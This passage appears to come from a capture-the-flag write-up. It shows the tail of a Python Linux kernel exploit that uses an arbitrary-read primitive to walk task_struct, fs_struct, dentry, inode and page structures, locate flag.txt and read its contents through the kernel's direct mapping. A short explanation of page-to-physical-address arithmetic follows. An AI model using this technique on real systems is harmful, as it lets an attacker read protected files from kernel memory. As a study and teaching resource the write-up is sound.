    initramfs_start_addr = kbase + (INITRAMFS_START_SYM - 0xFFFFFFFF81000000)
    initramfs_size_addr = kbase + (INITRAMFS_SIZE_SYM - 0xFFFFFFFF81000000)
    vmemmap_addr = kbase + (VMEMMAP_BASE_SYM - 0xFFFFFFFF81000000)

    print(f"[+] Page offset base = {page_offset_base_addr:016x}")
    print(f"[+] Initrd start = {initrd_start_addr:016x}")
    print(f"[+] Initrd end   = {initrd_end_addr:016x}")
    print(f"[+] phys_initrd_start = {phys_initrd_start_addr:016x}")
    print(f"[+] __initramfs_start = {initramfs_start_addr:016x}")
    print(f"[+] __initramfs_size  = {initramfs_size_addr:016x}")
    print(f"[+] vmemmap base sym = {vmemmap_addr:016x}")
    vmemmap = aar_read_qword_windowed(r, layout, vmemmap_addr)

    print(f"[+] vmemmap = {vmemmap:016x}")

    page_offset_base = aar_read_qword(r, layout, page_offset_base_addr)
    print(f"[+] page_offset_base = {hex(page_offset_base)}")

    task_struct_ptr = (
        module_base + MODULE_BSS_OFFSET_FROM_BASE + TASKSTRUCT_OFF_FROM_BSS
    )
    task_struct = u64(aar_read_via_next(r, layout, task_struct_ptr, 8))

    print(f"[+] Task struct: {task_struct:016x}")

    # DWARF debuginfo
    TASKSTRUCT_FS_OFFSET = 1592

    fs_struct = aar_read_qword(r, layout, task_struct + TASKSTRUCT_FS_OFFSET)

    if fs_struct:
        FS_STRUCT_ROOT_DENTRY_OFFSET = 24 + 8

        dentry_tree_root = aar_read_qword(
            r, layout, fs_struct + FS_STRUCT_ROOT_DENTRY_OFFSET
        )

        if dentry_tree_root:
            print(f"[+] Dentry tree root: {dentry_tree_root:016x}")

            DENTRY_INODE_OFFSET = 48
            DENTRY_INAME_OFFSET = 56
            DENTRY_CHILD_OFFSET = 168
            DENTRY_SIB_OFFSET = 152

            child_pointer = aar_read_qword_windowed(
                r, layout, dentry_tree_root + DENTRY_CHILD_OFFSET
            )
            while child_pointer:
                print(f"[+] Dentry children head: {child_pointer:016x}")

                child_file = child_pointer - DENTRY_SIB_OFFSET
                child_iname = aar_read_via_next(
                    r, layout, child_file + DENTRY_INAME_OFFSET, 16
                )

                print(f"[+] Child iname: {child_iname}")

                if b"flag.txt" in child_iname:
                    print("[+] Found flag dentry!")

                    flag_inode = aar_read_qword_windowed(
                        r, layout, child_file + DENTRY_INODE_OFFSET
                    )

                    if flag_inode:
                        INODE_MAPPING_OFFSET = 48

                        print(f"[+] Flag inode: {flag_inode:016x}")

                        flag_address_space_struct = aar_read_qword(
                            r, layout, flag_inode + INODE_MAPPING_OFFSET
                        )

                        if flag_address_space_struct:
                            ADDRESS_SPACE_PAGES_OFFSET = 8
                            XARRAY_HEAD_OFFSET = 8
                            print(
                                f"[+] Flag i_mapping: {flag_address_space_struct:016x}"
                            )

                            flag_page_xarray_head = aar_read_qword(
                                r,
                                layout,
                                flag_address_space_struct
                                + ADDRESS_SPACE_PAGES_OFFSET
                                + XARRAY_HEAD_OFFSET,
                            )

                            if flag_page_xarray_head:
                                phys_addr = (flag_page_xarray_head - vmemmap) * 64
                                print(
                                    f"[+] struct page* = : {flag_page_xarray_head:016x}"
                                )
                                print(f"[+] Physical address: {phys_addr:08x}")

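                                # Avoid shadowing the builtin `bytes`, and tolerate
                                # non-UTF-8 bytes in the page.
                                flag_text = aar_read_via_next(
                                    r, layout, page_offset_base + phys_addr + 1, 32
                                ).decode(errors="replace")

                                print(f"[+] Test read: {flag_text}")

                                if "server" in flag_text or "CSC" in flag_text: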
                                    print("[+] Found flag!")
                                    return

                    break

                child_next_sibling = aar_read_qword_windowed(
                    r, layout, child_file + DENTRY_SIB_OFFSET
                )
                child_pointer = child_next_sibling


if __name__ == "__main__":
    main()
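
The `(flag_page_xarray_head - vmemmap) * 64` step deserves a word. A `struct page *` is an index into the vmemmap array, so dividing the pointer difference by `sizeof(struct page)` gives the page frame number, and multiplying by the page size gives the physical address. With a 64-byte `struct page` and 4 KiB pages that collapses to a single multiplication by 64. The sketch below spells it out. The struct size is an assumption to verify against the DWARF info, and the addresses are hypothetical values picked only to make the arithmetic visible.

```python
PAGE_SIZE = 4096       # x86_64 base page size
STRUCT_PAGE_SIZE = 64  # assumed sizeof(struct page); verify against the DWARF info


def page_to_phys(page_ptr, vmemmap_base):
    """Convert a struct page pointer to the physical address of its page."""
    pfn = (page_ptr - vmemmap_base) // STRUCT_PAGE_SIZE
    return pfn * PAGE_SIZE


def phys_to_virt(phys, page_offset_base):
    """Address of a physical page inside the kernel's direct mapping."""
    return page_offset_base + phys


# Hypothetical values for illustration only.
vmemmap_base = 0xFFFFEA0000000000
page_offset_base = 0xFFFF888000000000
page_ptr = vmemmap_base + 0x1234 * STRUCT_PAGE_SIZE

phys = page_to_phys(page_ptr, vmemmap_base)
print(hex(phys), hex(phys_to_virt(phys, page_offset_base)))
```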

Notes